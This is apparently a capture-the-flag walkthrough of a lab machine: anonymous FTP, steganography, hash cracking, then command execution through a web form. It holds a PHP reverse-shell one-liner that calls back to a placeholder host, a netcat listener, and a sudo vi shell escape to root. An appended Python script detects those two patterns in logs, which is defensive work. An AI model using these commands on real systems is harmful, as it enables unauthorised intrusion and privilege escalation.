Deployed the machine and ready to enumerate.
After an Nmap scan, I found these ports open:
The first thing I did was access the website.
I have to find credentials. Let's go back to what information we have about the system. SSH? No, we don't have any key or credentials to log in with. FTP? Well, yes: it supports anonymous login, so we have something.
ftp [ip address] → when prompted for a username, just type anonymous
On the FTP server I found an image. I downloaded it and then used exiftool to see if there was anything useful. It had nothing. Then I used steghide without a password to extract information.
Got a base64-encoded text.
Decoding the base64 gave me a hash. I used John the Ripper to crack it:
john --wordlist=/usr/share/wordlists/rockyou.txt /root/Desktop/factoryhash.txt
Cracking the hash gave me the password for the user Charlie. I logged in to the website using those credentials.
It looks like I can execute commands through the website.
As a beginner I started trying to find a way to access files through the Execute button on the website, but I failed; I hadn't thought of using a reverse shell. After a little searching I found this website.
I knew that the website used PHP, so I used a PHP reverse shell:
php -r '$sock=fsockopen("<YOUR IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
I started listening on port 4444 using netcat:
nc -lvnp 4444
I pasted the reverse shell into the "Command" section of the website and pressed "Execute". I got in, but with limited privileges and mobility.
I searched through the directories. In the /home/charlie directory I found these 3 files.
I tried to cat user.txt but didn't have enough privileges. Then I used cat to read the teleport file, and it was an RSA key. I used that key to connect through SSH, and it was successful.
I went to the /Charlie directory to read the user.txt file, and it was the user's flag.
Now, to find the root flag I have to be root. I used sudo -l to see my privileges:
We can run vi with sudo. I searched for a way to get a shell from vi with root privileges and found this command:
sudo vi -c ':!/bin/sh' /dev/null
With that I had root privileges. I went to the root folder and found a Python file, "root.py". I ran python root.py and it asked for the key.
I pasted it and…
Below this text is the flag. And we are done!!
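From the defender's side, the two noisiest steps in this write-up (the PHP one-liner that hands a shell to a socket, and vi run under sudo with an `:!` command) are easy to spot in host logs. The script below is an added example, not part of the original write-up: the sudo lines follow sudo's syslog format, while the `exec ...` line format and all sample values (user, uid, IP, port) are constructed for this example.

```python
"""Flag two post-exploitation patterns from this write-up in host logs:
a PHP one-liner that opens a socket and attaches /bin/sh to it, and
sudo running vi with an ex command that shells out (':!...')."""
import re

# sudo's syslog format: "sudo: user : TTY=... ; PWD=... ; USER=root ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<target>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$")
# Constructed (assumed) process-exec line: "exec uid=<uid> comm=<name> cmdline=<args>"
EXEC_RE = re.compile(r"exec uid=(?P<uid>\d+) comm=(?P<comm>\S+) cmdline=(?P<cmd>.*)$")

# vi/vim given an ex command on the command line that starts with ':!' (shell escape)
VI_ESCAPE = re.compile(r"\b(vi|vim)\b.*\s-c\s+['\"]?:!")
# php -r that opens a network socket and then hands a shell to a process helper
PHP_SOCKET_SHELL = re.compile(
    r"fsockopen\(.*(popen|exec|system|proc_open)\(.*(/bin/sh|/bin/bash)")


def classify(line):
    """Return (finding, actor) for a suspicious line, or None."""
    m = SUDO_RE.search(line)
    if m and m.group("target") == "root" and VI_ESCAPE.search(m.group("cmd")):
        return ("sudo-editor-shell-escape", m.group("user"))
    m = EXEC_RE.search(line)
    if m and m.group("comm") == "php" and PHP_SOCKET_SHELL.search(m.group("cmd")):
        return ("php-reverse-shell", m.group("uid"))
    return None


def scan(lines):
    """Return [(line_no, finding, actor), ...] for every flagged line."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]


# Constructed sample log: a benign sudo vi, the escape, a harmless php -r, the shell
SAMPLE_LOG = [
    "sudo:  charlie : TTY=pts/0 ; PWD=/home/charlie ; USER=root ; COMMAND=/usr/bin/vi /etc/motd",
    "sudo:  charlie : TTY=pts/0 ; PWD=/home/charlie ; USER=root ; COMMAND=/usr/bin/vi -c ':!/bin/sh' /dev/null",
    "exec uid=33 comm=php cmdline=php -r echo 1;",
    'exec uid=33 comm=php cmdline=php -r $sock=fsockopen("10.0.0.5",4444);popen("/bin/sh -i <&3 >&3 2>&3", "r");',
]

if __name__ == "__main__":
    for line_no, finding, actor in scan(SAMPLE_LOG):
        print(f"line {line_no}: {finding} (actor {actor})")
```

Only the escape and the socket-shell lines are flagged; the plain `sudo vi /etc/motd` and `php -r echo 1;` pass, so the rules key on the shell hand-off rather than on vi or php alone.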